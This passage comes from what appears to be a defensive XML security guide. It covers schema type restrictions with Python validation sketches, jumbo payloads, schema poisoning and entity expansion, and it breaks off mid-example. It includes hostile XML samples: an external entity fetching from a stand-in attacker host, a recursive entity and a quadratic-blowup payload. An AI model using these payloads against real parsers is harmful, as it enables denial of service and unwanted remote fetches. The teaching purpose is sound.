     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;. &lt;br /&gt;
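&lt;br /&gt;
The arithmetic behind this logical flaw can be sketched in Python. The function names are assumptions made for the example, and &amp;lt;tt&amp;gt;is_positive_integer&amp;lt;/tt&amp;gt; is only an approximation of the &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; data type (it ignores whitespace normalization), not a replacement for schema validation:&lt;br /&gt;
&lt;br /&gt;
```python
from decimal import Decimal


def total(price, quantity):
    """Compute price * quantity from the lexical values found in the document."""
    return Decimal(price) * int(quantity)


def is_positive_integer(text):
    """Approximate xs:positiveInteger: optional plus sign, digits only, above zero."""
    digits = text[1:] if text.startswith("+") else text
    return digits.isascii() and digits.isdigit() and int(digits) > 0


print(total("10", "1"))    # one item at the listed price
print(total("10", "-5"))   # a negative quantity yields a negative total
print(is_positive_integer("-5"), is_positive_integer("0"), is_positive_integer("1"))
```
&lt;br /&gt;
Both quantities are valid integers, so only the stricter data type separates the legitimate order from the one that would credit the attacker.&lt;br /&gt;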
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. Some XML schema data types exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see a data type that allows zero being used instead, you may be able to trigger an error by setting the denominator to zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used for elements that should hold only real numbers, such as prices. This is a common error seen in other programming languages as well, not solely in these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With this schema, a price set to Infinity or NaN is rejected during validation, so these values never reach the application and cannot trigger errors there. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
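&lt;br /&gt;
The difference between the two data types can be illustrated with a short Python sketch. It assumes that the application converts the element content with Python's built-in &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt;, which accepts spellings such as &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;. The regular expression approximates the lexical form of &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; (optional sign, digits, optional fraction) and ignores whitespace normalization:&lt;br /&gt;
&lt;br /&gt;
```python
import math
import re

# Approximate lexical form of xs:decimal: optional sign, digits, optional fraction.
XS_DECIMAL = re.compile(r"[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)")


def is_xs_decimal(text):
    """Return True when text looks like a valid xs:decimal literal."""
    return XS_DECIMAL.fullmatch(text) is not None


for lexical in ("10.50", "INF", "-INF", "NaN"):
    as_float = float(lexical)
    # Columns: literal, accepted as decimal, finite as float, price times three.
    print(lexical, is_xs_decimal(lexical), math.isfinite(as_float), as_float * 3)
```
&lt;br /&gt;
Every literal converts to a float without raising an error, but only the first one passes the decimal check, which is the behavior the schema above relies on.&lt;br /&gt;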
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When a value must have an exact length (let's say 8), the length can be specified as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
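&lt;br /&gt;
The same pattern can be exercised outside a schema validator with a minimal Python sketch. XML schema patterns must match the whole value, so the sketch uses &amp;lt;tt&amp;gt;re.fullmatch&amp;lt;/tt&amp;gt; rather than a partial search. The function name &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt; is an assumption made for the example:&lt;br /&gt;
&lt;br /&gt;
```python
import re

# Same expression as the xs:pattern facet in the schema above.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(text):
    """Return True only when the entire value matches the SSN pattern."""
    return SSN_PATTERN.fullmatch(text) is not None


for candidate in ("123-45-6789", "123-45-67890", "123456789", "x123-45-6789"):
    print(candidate, is_valid_ssn(candidate))
```
&lt;br /&gt;
Only the first candidate is accepted; extra characters before or after an otherwise valid value cause the match to fail.&lt;br /&gt;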
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; cannot contain the value zero, while still allowing negative numbers as valid denominators.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Leaving the maximum number of occurrences undefined exposes the application to the consequences of receiving an extreme number of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could have a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and if there is no limit on the maximum number, it could have a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and, eventually, a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
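&lt;br /&gt;
When the schema itself cannot be changed, an application can still enforce a ceiling while it reads the document. The following is a minimal sketch in Python, assuming the standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; module; the function name and the limit of 1000 are hypothetical values chosen only for illustration:&lt;br /&gt;

```python
import io
import xml.etree.ElementTree as ET

MAX_BUY_ELEMENTS = 1000  # hypothetical limit, not taken from the schema above


def count_buy_elements(xml_bytes, limit=MAX_BUY_ELEMENTS):
    """Count buy elements, raising ValueError once the limit is exceeded."""
    count = 0
    # iterparse yields each element as soon as its end tag has been read,
    # so processing can stop before the whole document is consumed.
    for _event, element in ET.iterparse(io.BytesIO(xml_bytes), events=("end",)):
        if element.tag == "buy":
            count += 1
            if count > limit:
                raise ValueError("too many buy elements")
            element.clear()  # drop the children of items already counted
    return count
```

Replacing &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; with a concrete number in the schema remains the more direct fix; this sketch only illustrates the application-side check.&lt;br /&gt;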
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contain a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
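&lt;br /&gt;
A check for this condition can be automated before a local schema is loaded. The following is a minimal sketch in Python, assuming a POSIX filesystem and the standard &amp;lt;tt&amp;gt;os&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;stat&amp;lt;/tt&amp;gt; modules; the function name is hypothetical:&lt;br /&gt;

```python
import os
import stat


def is_world_writable(path):
    """Return True when any user on the system may modify the file."""
    # stat.filemode renders the mode the same way ls does, e.g. "-rw-rw-rw-".
    mode_string = stat.filemode(os.stat(path).st_mode)
    # Position 8 is the write flag of the "other users" permission triplet.
    return mode_string[8] == "w"
```

A file listed as &amp;lt;tt&amp;gt;-rw-rw-rw-&amp;lt;/tt&amp;gt; would be reported as world-writable, whereas one listed as &amp;lt;tt&amp;gt;-rw-r--r--&amp;lt;/tt&amp;gt; would not.&lt;br /&gt;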
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
